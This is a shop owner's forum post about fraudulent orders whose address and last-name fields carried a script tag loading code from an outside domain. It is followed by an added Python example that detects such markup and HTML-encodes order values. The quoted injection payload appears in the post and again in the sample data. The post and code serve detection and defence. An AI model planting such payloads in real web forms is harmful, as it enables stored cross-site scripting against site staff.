IDAutomation  
#1 Posted : Thursday, March 25, 2021 9:53:01 AM(UTC)
Yesterday morning, we received a strange order. The billing and shipping information was for New Hampshire but the IP location was Singapore. For our customer base, this kind of scenario usually means a fraud attempt. This is not totally uncommon and we have procedures for this. But, I noticed something different about this order in that it had the following in Address Line 2 fields:

< script src = //addjs.co > < /script >

I've spaced out various parts of the code because I thought that would render it inoperable. I removed this code from the address line 2 field and followed our process for handling refund orders. This morning I received another of these same types of orders, with the same script in the Last Name field.

I do not know much about this other than the fact that it is a JavaScript Injection attempt. But to what end? What measures can we take within the AbleCommerce system to prevent this type of thing from happening again?
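An added example, not part of the original post and not AbleCommerce code: a screening check that flags orders whose name or address fields contain tag-like markup, plus HTML-encoding of a stored value before it is written into an admin or invoice page. The field names and the dict-per-order export format are assumptions; the markup string is the one quoted in the post.

```python
import html
import re

# Tag-like markup, tolerant of padding whitespace such as "< script ... >".
TAG_RE = re.compile(r"<\s*/?\s*[A-Za-z][^<>]*>")

# Hypothetical field names for an exported order record (not AbleCommerce's schema).
FREE_TEXT_FIELDS = ("first_name", "last_name", "address1", "address2", "city")


def find_markup_fields(order):
    """Return the free-text fields of one order whose value contains tag-like markup."""
    return [f for f in FREE_TEXT_FIELDS if TAG_RE.search(order.get(f) or "")]


def render_safe(value):
    """HTML-encode a stored value before writing it into an admin or invoice page."""
    return html.escape(value or "", quote=True)


def triage(orders):
    """Map order id -> suspicious fields, for orders that have any."""
    report = {}
    for order in orders:
        hits = find_markup_fields(order)
        if hits:
            report[order["id"]] = hits
    return report


# Constructed sample orders; the markup string is the one quoted in the post.
PAYLOAD = "< script src = //addjs.co > < /script >"
SAMPLE_ORDERS = [
    {"id": 1001, "first_name": "Ann", "last_name": "Lee",
     "address1": "12 Elm St", "address2": "Apt <3", "city": "Concord"},
    {"id": 1002, "first_name": "Bob", "last_name": "Ray",
     "address1": "4 Oak Ave", "address2": PAYLOAD, "city": "Nashua"},
    {"id": 1003, "first_name": "Cy", "last_name": PAYLOAD,
     "address1": "9 Pine Rd", "address2": "", "city": "Dover"},
]

if __name__ == "__main__":
    for order_id, fields in triage(SAMPLE_ORDERS).items():
        print(order_id, fields)
    print(render_safe(PAYLOAD))
```

The screening step only surfaces orders for review; encoding on output is what keeps a stored value from being interpreted as markup when staff open the order.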
